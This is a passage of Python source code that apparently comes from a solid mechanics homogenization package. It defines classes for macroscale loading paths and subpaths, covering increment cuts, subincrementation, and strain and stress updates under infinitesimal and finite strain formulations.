default=5\n Maximum level of loading subincrementation.\n max_cinc_cuts : int, default=5\n Maximum number of consecutive load increment cuts.\n \"\"\"\n self._strain_formulation = strain_formulation\n self._problem_type = problem_type\n self._mac_load = mac_load\n self._mac_load_presctype = mac_load_presctype\n self._mac_load_increm = mac_load_increm\n self._max_subinc_level = max_subinc_level\n self._max_cinc_cuts = max_cinc_cuts\n # Get problem type parameters\n n_dim, comp_order_sym, comp_order_nsym = \\\n mop.get_problem_type_parameters(problem_type)\n self._n_dim = n_dim\n self._comp_order_sym = comp_order_sym\n self._comp_order_nsym = comp_order_nsym\n # Remove symmetric components under an infinitesimal strain formulation\n if strain_formulation == 'infinitesimal':\n self._remove_sym(comp_order_sym, comp_order_nsym)\n # Set total number of loading subpaths\n self._n_load_subpaths = len(mac_load_increm.keys())\n # Initialize list of loading subpaths\n self._load_subpaths = []\n # Initialize increment state\n self._increm_state = {'inc': 0, 'subpath_id': -1}\n # Initialize converged homogenized state\n self._conv_hom_state = {key: None for key in ['strain', 'stress']}\n # Initialize loading last increment flag\n self._is_last_inc = False\n # Initialize consecutive increment cuts counter\n self._n_cinc_cuts = 0\n # -------------------------------------------------------------------------\n def new_load_increment(self):\n \"\"\"Setup new loading increment and get 
associated data.\n\n Returns\n -------\n applied_mac_load_mf : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n inc_mac_load_mf : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the incremental loading constraint matricial form in a\n numpy.ndarray of shape (n_comps,).\n n_presc_strain : int\n Number of prescribed loading strain components.\n presc_strain_idxs : list[int]\n Prescribed loading strain components indexes.\n n_presc_stress : int\n Number of prescribed loading stress components.\n presc_stress_idxs : list[int]\n Prescribed loading stress components indexes.\n is_last_inc : bool\n Loading last increment flag.\n \"\"\"\n # Set strain/stress components order according to problem strain\n # formulation\n if self._strain_formulation == 'infinitesimal':\n comp_order = self._comp_order_sym\n elif self._strain_formulation == 'finite':\n comp_order = self._comp_order_nsym\n else:\n raise RuntimeError('Unknown problem strain formulation.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Reset consecutive loading increment cuts counter\n self._n_cinc_cuts = 0\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Add a new loading subpath to the loading path if either first load\n # increment or current loading subpath is completed\n if self._increm_state['inc'] == 0 \\\n or self._get_load_subpath()._is_last_subpath_inc:\n # Add a new loading subpath\n self._new_subpath()\n # Get current loading subpath\n load_subpath = self._get_load_subpath()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Update loading increment\n self._update_inc()\n # Check if last loading increment\n if load_subpath._id == self._n_load_subpaths - 1 and \\\n load_subpath._is_last_subpath_inc:\n self._is_last_inc = True\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current applied loading\n applied_mac_load = self._get_applied_mac_load()\n applied_mac_load_mf = {}\n for ltype in applied_mac_load.keys():\n applied_mac_load_mf[ltype] = type(self)._get_load_mf(\n self._n_dim, comp_order, applied_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current incremental loading\n inc_mac_load = self._get_inc_mac_load()\n inc_mac_load_mf = {}\n for ltype in inc_mac_load.keys():\n inc_mac_load_mf[ltype] = type(self)._get_load_mf(\n self._n_dim, comp_order, inc_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return\n return applied_mac_load_mf, inc_mac_load_mf, \\\n load_subpath._n_presc_strain, load_subpath._presc_strain_idxs, \\\n load_subpath._n_presc_stress, load_subpath._presc_stress_idxs, \\\n self._is_last_inc\n # -------------------------------------------------------------------------\n def increment_cut(self, n_dim, comp_order):\n \"\"\"Perform loading increment cut and setup new increment.\n\n Parameters\n ----------\n n_dim : int\n Problem dimension.\n comp_order : list[str]\n Strain/Stress components (str) order.\n\n Returns\n -------\n applied_mac_load_mf : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n inc_mac_load_mf : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the incremental loading constraint 
matricial form in a\n numpy.ndarray of shape (n_comps,).\n n_presc_strain : int\n Number of prescribed macroscale loading strain components.\n presc_strain_idxs : list[int]\n Prescribed macroscale loading strain components indexes.\n n_presc_stress : int\n Number of prescribed macroscale loading stress components.\n presc_stress_idxs : list[int]\n Prescribed macroscale loading stress components indexes.\n is_last_inc : bool\n Loading last increment flag.\n \"\"\"\n # Get display features\n indent = ioutil.setdisplayfeatures()[2]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get current loading subpath\n load_subpath = self._get_load_subpath()\n # Perform loading increment\n load_subpath.increment_cut()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Set last macroscale loading increment flag\n self._is_last_inc = False\n # Increment (+1) consecutive loading increment cuts counter\n self._n_cinc_cuts += 1\n # Check if maximum number of consecutive loading increment cuts is\n # surpassed\n if self._n_cinc_cuts > self._max_cinc_cuts:\n summary = 'Maximum number of consecutive loading increment cuts'\n description = 'Maximum number of macroscale loading consecutive ' \\\n + 'increment cuts ({}) has been reached' + '\\n' \\\n + indent + 'without solution convergence.'\n info.displayinfo('4', summary, description, self._max_cinc_cuts)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current applied loading\n applied_mac_load = self._get_applied_mac_load()\n applied_mac_load_mf = {}\n for ltype in applied_mac_load.keys():\n applied_mac_load_mf[ltype] = type(self)._get_load_mf(\n self._n_dim, comp_order, applied_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute incremental loading\n inc_mac_load = self._get_inc_mac_load()\n inc_mac_load_mf = {}\n for ltype in inc_mac_load.keys():\n inc_mac_load_mf[ltype] = type(self)._get_load_mf(\n n_dim, comp_order, inc_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return applied_mac_load_mf, inc_mac_load_mf, \\\n load_subpath._n_presc_strain, load_subpath._presc_strain_idxs, \\\n load_subpath._n_presc_stress, load_subpath._presc_stress_idxs, \\\n self._is_last_inc\n # -------------------------------------------------------------------------\n def update_hom_state(self, hom_strain_mf, hom_stress_mf):\n \"\"\"Update converged homogenized state.\n\n Parameters\n ----------\n hom_strain_mf : numpy.ndarray (1d)\n Homogenized strain tensor stored in matricial form.\n hom_stress_mf : numpy.ndarray (1d)\n Homogenized stress tensor stored in matricial form.\n \"\"\"\n # Set strain/stress components order according to problem strain\n # formulation\n if self._strain_formulation == 'infinitesimal':\n comp_order = self._comp_order_sym\n elif self._strain_formulation == 'finite':\n comp_order = self._comp_order_nsym\n else:\n raise RuntimeError('Unknown problem strain formulation.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Build homogenized strain tensor\n hom_strain = mop.get_tensor_from_mf(hom_strain_mf, self._n_dim,\n comp_order)\n # Build homogenized stress tensor\n hom_stress = mop.get_tensor_from_mf(hom_stress_mf, self._n_dim,\n comp_order)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Initialize converged homogenized strain and stress tensors vector\n # form\n self._conv_hom_state['strain'] = 
np.zeros(len(comp_order))\n self._conv_hom_state['stress'] = np.zeros(len(comp_order))\n # Loop over strain/stress components\n for k in range(len(comp_order)):\n # Get strain/stress component\n comp = comp_order[k]\n # Get component indexes\n i = int(comp[0]) - 1\n j = int(comp[1]) - 1\n # Build converged homogenized strain and stress tensors vector form\n self._conv_hom_state['strain'][k] = hom_strain[i, j]\n self._conv_hom_state['stress'][k] = hom_stress[i, j]\n # -------------------------------------------------------------------------\n def get_subpath_state(self):\n \"\"\"Get current loading subpath state.\n\n Returns\n -------\n id : int\n Loading subpath id.\n inc : int\n Current loading subpath increment counter.\n total_lfact : float\n Current loading subpath current total load factor.\n inc_lfact : float\n Current loading subpath current incremental load factor.\n total_time : float\n Current loading subpath current total time.\n inc_time : float\n Current loading subpath current incremental time.\n sub_inc_level : int\n Current loading subpath current subincrementation level.\n \"\"\"\n # Get current loading subpath\n load_subpath = self._get_load_subpath()\n # Return loading subpath state\n return load_subpath.get_state()\n # -------------------------------------------------------------------------\n def get_increm_state(self):\n \"\"\"Get incremental state.\n\n Returns\n -------\n increm_state : dict\n Increment state: key `inc` contains the current increment number,\n key `subpath_id` contains the current loading subpath index.\n \"\"\"\n return copy.deepcopy(self._increm_state)\n # -------------------------------------------------------------------------\n def _new_subpath(self):\n \"\"\"Add a new loading subpath to the loading path.\"\"\"\n # Increment (+1) loading subpath id\n self._increm_state['subpath_id'] += 1\n subpath_id = self._increm_state['subpath_id']\n # Get load and prescription types of the current loading subpath\n presctype = self._mac_load_presctype[:, subpath_id]\n load = {key: np.zeros(self._mac_load[key].shape[0])\n for key in self._mac_load.keys() if key in presctype}\n for ltype in load.keys():\n load[ltype] = self._mac_load[ltype][:, 1 + subpath_id]\n # Get loading subpath incremental load factors and incremental times\n inc_lfacts = list(self._mac_load_increm[str(subpath_id)][:, 0])\n inc_times = list(self._mac_load_increm[str(subpath_id)][:, 1])\n # Add a new loading subpath\n self._load_subpaths.append(\n LoadingSubpath(subpath_id, self._strain_formulation,\n self._problem_type, self._conv_hom_state,\n load, presctype, inc_lfacts, inc_times,\n self._max_subinc_level))\n # -------------------------------------------------------------------------\n def _get_load_subpath(self):\n \"\"\"Get current loading subpath.\n\n Returns\n -------\n load_subpath : LoadingSubpath\n Current loading subpath.\n \"\"\"\n return self._load_subpaths[self._increm_state['subpath_id']]\n # -------------------------------------------------------------------------\n def _update_inc(self):\n \"\"\"Update loading increment counters.\"\"\"\n # Increment (+1) global increment counter\n self._increm_state['inc'] += 1\n # Increment (+1) loading subpath increment counter\n self._get_load_subpath().update_inc()\n # -------------------------------------------------------------------------\n def _get_applied_mac_load(self):\n \"\"\"Compute current applied loading.\n\n Returns\n -------\n applied_mac_load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), 
stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n \"\"\"\n # Get current applied loading\n applied_mac_load = self._get_load_subpath().get_applied_load()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return applied_mac_load\n # -------------------------------------------------------------------------\n def _get_inc_mac_load(self):\n \"\"\"Compute current incremental loading.\n\n Returns\n -------\n inc_mac_load : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the incremental loading constraint in a numpy.ndarray of shape\n (n_comps,).\n \"\"\"\n # Get current incremental loading\n inc_mac_load = self._get_load_subpath().get_inc_applied_load()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return inc_mac_load\n # -------------------------------------------------------------------------\n def _remove_sym(self, comp_order_sym, comp_order_nsym):\n \"\"\"Remove the symmetric components of loading related objects.\n\n Under an infinitesimal strain formulation, remove the symmetric\n strain/stress components of loading related objects. In addition, the\n remaining independent components are sorted according to the problem\n strain/stress symmetric component order.\n\n ----\n\n Parameters\n ----------\n comp_order_sym : list[str]\n Symmetric strain/stress components (str) order.\n comp_order_nsym : list[str]\n Nonsymmetric strain/stress components (str) order.\n \"\"\"\n # Copy loading objects\n mac_load_cp = copy.deepcopy(self._mac_load)\n mac_load_presctype_cp = copy.deepcopy(self._mac_load_presctype)\n # Loop over symmetric components indexes\n for i in range(len(comp_order_sym)):\n # Get non-symmetric component index\n j = comp_order_nsym.index(comp_order_sym[i])\n # Assemble symmetric components\n for ltype in self._mac_load.keys():\n if ltype in self._mac_load_presctype:\n self._mac_load[ltype][i, :] = mac_load_cp[ltype][j, :]\n self._mac_load_presctype[i, :] = mac_load_presctype_cp[j, :]\n # Remove (non-symmetric) additional components\n n_sym = len(comp_order_sym)\n for ltype in self._mac_load.keys():\n if ltype in self._mac_load_presctype:\n self._mac_load[ltype] = self._mac_load[ltype][0:n_sym, :]\n self._mac_load_presctype = self._mac_load_presctype[:n_sym, :]\n # -------------------------------------------------------------------------\n @staticmethod\n def _get_load_mf(n_dim, comp_order, load_vector):\n \"\"\"Get matricial form of load tensor given in vector form.\n\n Parameters\n ----------\n comp_order : list[str]\n Strain/Stress components (str) order.\n load_vector : numpy.ndarray (1d)\n Loading tensor in vector form (numpy.ndarray of shape (n_comps,)).\n\n Returns\n -------\n load_mf : numpy.ndarray (1d)\n Loading tensor matricial form (numpy.ndarray of shape (n_comps,)).\n \"\"\"\n # Initialize incremental macroscale load tensor\n load_matrix = np.zeros((n_dim, n_dim))\n # Build incremental macroscale load tensor\n for j in range(n_dim):\n for i in range(0, j + 1):\n load_matrix[i, j] = \\\n load_vector[comp_order.index(str(i + 1) + str(j + 1))]\n if i != j:\n if n_dim**2 == len(comp_order):\n load_matrix[j, i] = load_vector[\n comp_order.index(str(j + 1) + str(i + 1))]\n else:\n load_matrix[j, i] = load_matrix[i, j]\n # Set incremental macroscopic load matricial form\n load_mf = mop.get_tensor_mf(load_matrix, n_dim, comp_order)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return load_mf\n# 
=============================================================================\nclass LoadingSubpath:\n \"\"\"Loading subpath.\n\n Attributes\n ----------\n _n_dim : int\n Problem number of spatial dimensions.\n _comp_order_sym : list[str]\n Strain/Stress components symmetric order.\n _comp_order_nsym : list[str]\n Strain/Stress components nonsymmetric order.\n _inc : int\n Loading subpath increment counter.\n _total_lfact : float\n Loading subpath total load factor.\n _total_time : float\n Loading subpath total time.\n _n_presc_strain : int\n Number of prescribed loading strain components.\n _n_presc_stress : int\n Number of prescribed loading stress components.\n _presc_strain_idxs : list[int]\n Prescribed loading strain components indexes.\n _presc_stress_idxs : list[int]\n Prescribed loading stress components indexes.\n _applied_load : dict\n For each prescribed loading nature type (key, {'strain', 'stress'}),\n stores the current applied loading constraints in a numpy.ndarray of\n shape (n_comps,).\n _inc_applied_load : dict\n For each prescribed loading nature type (key, {'strain', 'stress'}),\n stores the current incremental applied loading constraints in a\n numpy.ndarray of shape (n_comps,).\n _is_last_subpath_inc : bool\n Loading subpath last increment flag.\n _sub_inc_levels : list\n History of subincrementation levels.\n\n Methods\n -------\n get_state(self)\n Get loading subpath state data.\n update_inc(self)\n Update increment counter, total load factor and applied loading.\n increment_cut(self)\n Perform loading increment cut.\n get_applied_load(self)\n Get current applied loading.\n get_inc_applied_load(self)\n Get current incremental applied loading.\n _update_inc_applied_load(self)\n Update current incremental applied loading.\n \"\"\"\n def __init__(self, id, strain_formulation, problem_type,\n init_conv_hom_state, load, presctype, inc_lfacts, inc_times,\n max_subinc_level):\n \"\"\"Constructor.\n\n Parameters\n ----------\n id : int\n Loading subpath id.\n strain_formulation: {'infinitesimal', 'finite'}\n Problem strain formulation.\n problem_type : int\n Problem type: 2D plane strain (1), 2D plane stress (2),\n 2D axisymmetric (3) and 3D (4).\n init_conv_hom_state : dict\n Converged homogenized state (item, numpy.ndarray of shape\n (n_comps,)) for key in {'strain', 'stress'} at the beginning of\n loading subpath.\n load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the loading constraints in a\n numpy.ndarray of shape (n_comps,).\n presctype : numpy.ndarray (1d)\n Loading nature type ({'strain', 'stress'}) associated with\n each macroscale loading constraint (numpy.ndarray of shape\n (n_comps,)).\n inc_lfacts : numpy.ndarray (1d)\n Loading subpath incremental load factors (numpy.ndarray of shape\n (n_increments,)).\n inc_times : numpy.ndarray (1d)\n Loading subpath incremental times (numpy.ndarray of shape\n (n_increments,)).\n max_subinc_level : int\n Maximum level of loading subincrementation.\n \"\"\"\n self._id = id\n self._strain_formulation = strain_formulation\n self._problem_type = problem_type\n self._init_conv_hom_state = copy.deepcopy(init_conv_hom_state)\n self._load = copy.deepcopy(load)\n self._presctype = copy.deepcopy(presctype)\n self._inc_lfacts = copy.deepcopy(inc_lfacts)\n self._inc_times = copy.deepcopy(inc_times)\n self._max_subinc_level = max_subinc_level\n # Get problem type parameters\n n_dim, comp_order_sym, comp_order_nsym = \\\n mop.get_problem_type_parameters(problem_type)\n self._n_dim = n_dim\n 
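        # For reference (an assumption based on the component strings such as
        # '11' and '12' used elsewhere in this module, not on the
        # get_problem_type_parameters source): a 2D problem would give
        # something like n_dim == 2, comp_order_sym == ['11', '22', '12'] and
        # comp_order_nsym == ['11', '21', '12', '22'].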
self._comp_order_sym = comp_order_sym\n self._comp_order_nsym = comp_order_nsym\n # Initialize loading subpath increment counter\n self._inc = 0\n # Initialize loading subpath total load factor\n self._total_lfact = 0\n # Initialize loading subpath total time\n self._total_time = 0\n # Set number of prescribed loading strain and stress components and\n # associated indexes\n self._n_presc_strain = sum([x == 'strain' for x in self._presctype])\n self._n_presc_stress = sum([x == 'stress' for x in self._presctype])\n self._presc_strain_idxs = []\n self._presc_stress_idxs = []\n for i in range(len(presctype)):\n if presctype[i] == 'strain':\n self._presc_strain_idxs.append(i)\n else:\n self._presc_stress_idxs.append(i)\n # Initialize current applied and incremental applied loading\n self._applied_load = {key: np.zeros(load[key].shape[0])\n for key in load.keys()}\n self._inc_applied_load = {key: np.zeros(load[key].shape[0])\n for key in load.keys()}\n # Initialize loading subpath last increment flag\n self._is_last_subpath_inc = False\n # Initialize subincrementation levels\n self._sub_inc_levels = [0]*len(self._inc_lfacts)\n # -------------------------------------------------------------------------\n def get_state(self):\n \"\"\"Get loading subpath state data.\n\n Returns\n -------\n id : int\n Loading subpath id.\n inc : int\n Loading subpath increment counter.\n total_lfact : float\n Loading subpath current total load factor.\n inc_lfact : float\n Loading subpath current incremental load factor.\n total_time : float\n Loading subpath current total time.\n inc_time : float\n Loading subpath current incremental time.\n sub_inc_level : int\n Loading subpath current subincrementation level.\n \"\"\"\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # Return\n return self._id, self._inc, self._total_lfact, \\\n self._inc_lfacts[inc_idx], self._total_time, \\\n self._inc_times[inc_idx], self._sub_inc_levels[inc_idx]\n # -------------------------------------------------------------------------\n def update_inc(self):\n \"\"\"Update increment counter, total load factor and applied loading.\"\"\"\n # Increment (+1) loading subpath increment counter\n self._inc += 1\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Procedure related with the loading subincrementation: upon\n # convergence of a given increment, guarantee that the following\n # increment magnitude is at most one (subincrementation) level above.\n # The increment cut procedure is performed the required number of times\n # in order to ensure this progressive recovery towards the prescribed\n # incrementation\n if self._inc > 1:\n while self._sub_inc_levels[inc_idx - 1] \\\n - self._sub_inc_levels[inc_idx] >= 2:\n self.increment_cut()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Update total load factor\n self._total_lfact = sum(self._inc_lfacts[0:self._inc])\n # Update total time\n self._total_time = sum(self._inc_times[0:self._inc])\n # Update current incremental applied loading\n self._update_inc_applied_load()\n # Check if last increment\n if self._inc == len(self._inc_lfacts):\n self._is_last_subpath_inc = True\n # -------------------------------------------------------------------------\n def increment_cut(self):\n \"\"\"Perform loading increment cut.\"\"\"\n # Get display features\n indent = ioutil.setdisplayfeatures()[2]\n # 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # Update subincrementation level\n self._sub_inc_levels[inc_idx] += 1\n self._sub_inc_levels.insert(inc_idx + 1, self._sub_inc_levels[inc_idx])\n # Check if maximum subincrementation level is surpassed\n if self._sub_inc_levels[inc_idx] > self._max_subinc_level:\n summary = 'Maximum loading subincrementation level'\n description = 'The maximum macroscale loading subincrementation ' \\\n + 'level ({}) has been reached without' + '\\n' \\\n + indent + 'solution convergence.'\n info.displayinfo('4', summary, description, self._max_subinc_level)\n # Get current incremental load factor and associated incremental time\n inc_lfact = self._inc_lfacts[inc_idx]\n inc_time = self._inc_times[inc_idx]\n # Cut load increment in half\n self._inc_lfacts[inc_idx] = inc_lfact/2.0\n self._inc_lfacts.insert(inc_idx + 1, self._inc_lfacts[inc_idx])\n self._inc_times[inc_idx] = inc_time/2.0\n self._inc_times.insert(inc_idx + 1, self._inc_times[inc_idx])\n # Update total load factor and total time\n self._total_lfact = sum(self._inc_lfacts[0:self._inc])\n self._total_time = sum(self._inc_times[0:self._inc])\n # Update current incremental applied loading\n self._update_inc_applied_load()\n # Set loading subpath last increment flag\n self._is_last_subpath_inc = False\n # -------------------------------------------------------------------------\n def get_applied_load(self):\n \"\"\"Get current applied loading.\n\n Returns\n -------\n applied_load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n \"\"\"\n return copy.deepcopy(self._applied_load)\n # -------------------------------------------------------------------------\n def get_inc_applied_load(self):\n \"\"\"Get current incremental applied loading.\n\n Returns\n -------\n inc_applied_load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current incremental applied\n loading constraints in a numpy.ndarray of shape (n_comps,).\n \"\"\"\n return copy.deepcopy(self._inc_applied_load)\n # -------------------------------------------------------------------------\n def _update_inc_applied_load(self):\n \"\"\"Update current incremental applied loading.\n\n *Infinitesimal strains:*\n\n .. math::\n\n \\\\boldsymbol{\\\\varepsilon}_{n+1} =\n \\\\boldsymbol{\\\\varepsilon}_{0} + \\\\lambda_{n+1}\n (\\\\boldsymbol{\\\\varepsilon}^{\\\\text{total}} -\n \\\\boldsymbol{\\\\varepsilon}_{0})\n\n .. math::\n\n \\\\Delta \\\\boldsymbol{\\\\varepsilon}_{n+1} =\n \\\\Delta \\\\lambda_{n+1} (\\\\boldsymbol{\\\\varepsilon}^{\n \\\\text{total}} - \\\\boldsymbol{\\\\varepsilon}_{0})\n\n where :math:`\\\\boldsymbol{\\\\varepsilon}_{n+1}` is the current\n applied infinitesimal strain tensor, :math:`\\\\lambda_{n+1}` is the\n current load factor,\n :math:`\\\\boldsymbol{\\\\varepsilon}^{\\\\text{total}}` is the total\n infinitesimal strain tensor prescribed in the mononotic loading\n path, :math:`\\\\boldsymbol{\\\\varepsilon}_{0}` is the infinitesimal\n strain tensor at the beginning of the mononotic loading path,\n :math:`\\\\Delta \\\\boldsymbol{\\\\varepsilon}_{n+1}` is the\n incremental infinitesimal strain tensor,\n :math:`\\\\Delta \\\\lambda_{n+1}` is the incremental load factor, and\n :math:`n+1` denotes the current increment.\n\n .. 
math::\n\n \\\\boldsymbol{\\\\sigma}_{n+1} = \\\\boldsymbol{\\\\sigma}_{0} +\n \\\\lambda_{n+1} (\\\\boldsymbol{\\\\sigma}^{\\\\text{total}} -\n \\\\boldsymbol{\\\\sigma}_{0})\n\n .. math::\n\n \\\\Delta \\\\boldsymbol{\\\\sigma}_{n+1} = \\\\Delta \\\\lambda_{n+1}\n (\\\\boldsymbol{\\\\sigma}^{\\\\text{total}} -\n \\\\boldsymbol{\\\\sigma}_{0})\n\n where :math:`\\\\boldsymbol{\\\\sigma}_{n+1}` is the current applied\n Cauchy stress tensor, :math:`\\\\lambda_{n+1}` is the current load\n factor, :math:`\\\\boldsymbol{\\\\sigma}^{\\\\text{total}}` is the total\n Cauchy stress tensor prescribed in the mononotic loading path,\n :math:`\\\\boldsymbol{\\\\sigma}_{0}` is the Cauchy stress tensor at\n the beginning of the mononotic loading path,\n :math:`\\\\Delta \\\\boldsymbol{\\\\sigma}_{n+1}` is the incremental\n Cauchy stress tensor, :math:`\\\\Delta \\\\lambda_{n+1}` is the\n incremental load factor, and :math:`n+1` denotes the current\n increment.\n\n ----\n\n *Finite strains:*\n\n .. math::\n\n \\\\boldsymbol{F}_{n+1} = \\\\exp (\\\\lambda_{n+1} \\\\ln (\n \\\\boldsymbol{F}^{\\\\text{total}} \\\\boldsymbol{F}_{0}^{-1}))\n \\\\boldsymbol{F}_{0}\n\n .. math::\n\n \\\\boldsymbol{F}_{\\\\Delta, n+1} = \\\\exp (\\\\Delta \\\\lambda_{n+1}\n \\\\ln ( \\\\boldsymbol{F}^{\\\\text{total}}\n \\\\boldsymbol{F}_{0}^{-1}))\n\n where :math:`\\\\boldsymbol{F}_{n+1}` is the current applied\n deformation gradient, :math:`\\\\lambda_{n+1}` is the current load\n factor, :math:`\\\\boldsymbol{F}_{\\\\text{total}}` is the total\n deformation gradient prescribed in the mononotic loading path, and\n :math:`\\\\boldsymbol{F}_{0}` is the deformation gradient\n at the beginning of the mononotic loading path,\n :math:`\\\\boldsymbol{F}_{\\\\Delta, n+1}` is the incremental\n deformation gradient, :math:`\\\\Delta \\\\lambda_{n+1}` is the\n incremental load factor, and :math:`n+1` denotes the current\n increment.\n\n .. math::\n\n \\\\boldsymbol{P}_{n+1} = \\\\boldsymbol{P}_{0} + \\\\lambda_{n+1}\n (\\\\boldsymbol{P}^{\\\\text{total}} - \\\\boldsymbol{P}_{0})\n\n .. 
math::\n\n \\\\Delta \\\\boldsymbol{P}_{n+1} = \\\\Delta \\\\lambda_{n+1}\n (\\\\boldsymbol{P}^{\\\\text{total}} - \\\\boldsymbol{P}_{0})\n\n where :math:`\\\\boldsymbol{P}_{n+1}` is the current applied first\n Piola-Kirchhoff stress tensor, :math:`\\\\lambda_{n+1}` is the\n current load factor, :math:`\\\\boldsymbol{P}^{\\\\text{total}}` is the\n total first Piola-Kirchhoff stress tensor prescribed in the\n mononotic loading path, :math:`\\\\boldsymbol{P}_{0}` is the first\n Piola-Kirchhoff stress tensor at the beginning of the mononotic\n loading path, :math:`\\\\Delta \\\\boldsymbol{P}_{n+1}` is the\n incremental first Piola-Kirchhoff stress tensor,\n :math:`\\\\Delta \\\\lambda_{n+1}` is the incremental load factor, and\n :math:`n+1` denotes the current increment.\n\n **Remark**: It is not straightforward how to perform a\n component-wise multiplicative decomposition of the deformation\n gradient in the case of a mixed strain-stress loading prescription.\n \"\"\"\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # Get current incremental load factor and associated incremental time\n inc_lfact = self._inc_lfacts[inc_idx]\n # Evaluate prescription type\n is_strain_only = 'stress' not in self._inc_applied_load.keys()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Update current incremental applied loading\n if self._strain_formulation == 'finite' and is_strain_only:\n # Initialize initial and total deformation gradient\n def_gradient_init = np.zeros((self._n_dim, self._n_dim))\n def_gradient_total = np.zeros((self._n_dim, self._n_dim))\n # Build initial and total deformation gradient\n for i in range(len(self._comp_order_nsym)):\n # Get component second-order index\n so_idx = tuple([int(x) - 1\n for x in list(self._comp_order_nsym[i])])\n # Build initial and total deformation gradient\n def_gradient_init[so_idx] = \\\n self._init_conv_hom_state['strain'][i]\n def_gradient_total[so_idx] = self._load['strain'][i]\n # Compute total incremental deformation gradient (multiplicative\n # decomposition)\n inc_def_gradient_total = np.matmul(\n def_gradient_total, np.linalg.inv(def_gradient_init))\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute incremental deformation gradient relative to initial\n # deformation gradient (multiplicative decomposition)\n inc_init_def_gradient = mop.matrix_root(inc_def_gradient_total,\n self._total_lfact)\n # Compute current applied deformation gradient\n applied_def_gradient = np.matmul(inc_init_def_gradient,\n def_gradient_init)\n # Store current applied deformation gradient components\n for i in range(len(self._comp_order_nsym)):\n # Get component second-order index\n so_idx = tuple([int(x) - 1\n for x in list(self._comp_order_nsym[i])])\n # Store current applied deformation gradient component\n self._applied_load['strain'][i] = applied_def_gradient[so_idx]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current incremental deformation gradient (multiplicative\n # decomposition)\n inc_def_gradient = mop.matrix_root(inc_def_gradient_total,\n inc_lfact)\n # Store current incremental deformation gradient components\n for i in range(len(self._comp_order_nsym)):\n # Get component second-order index\n so_idx = tuple([int(x) - 1\n for x in list(self._comp_order_nsym[i])])\n # Store incremental deformation gradient component\n self._inc_applied_load['strain'][i] = inc_def_gradient[so_idx]\n else:\n # Loop over prescription types\n for ltype in 
